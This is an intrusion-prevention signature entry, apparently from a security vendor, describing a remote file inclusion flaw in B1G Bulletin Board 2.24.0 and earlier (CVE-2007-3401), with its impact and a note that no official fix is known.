Intrusion Prevention

B1GBB.Footer.Inc.PHP.File.Inclusion

Description

B1G Bulletin Board (b1gBB) has a remote file include vulnerability. A remote attacker could execute arbitrary script code on the web server with the privileges of the server. This can be done via a specially crafted URL request to the 'footer.inc.php' script, using the 'tfooter' parameter to specify a malicious PHP file from a remote system.

Affected Products

B1G Bulletin Board (b1gBB) version 2.24.0 and prior.

Impact

System compromise, remote script execution.

Recommended Actions

Currently we are not aware of any officially supplied fix for this issue.

CVE References

CVE-2007-3401